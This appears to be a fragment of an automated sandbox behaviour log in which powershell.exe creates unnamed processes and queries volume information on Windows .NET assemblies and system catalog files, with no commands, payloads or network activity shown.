Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
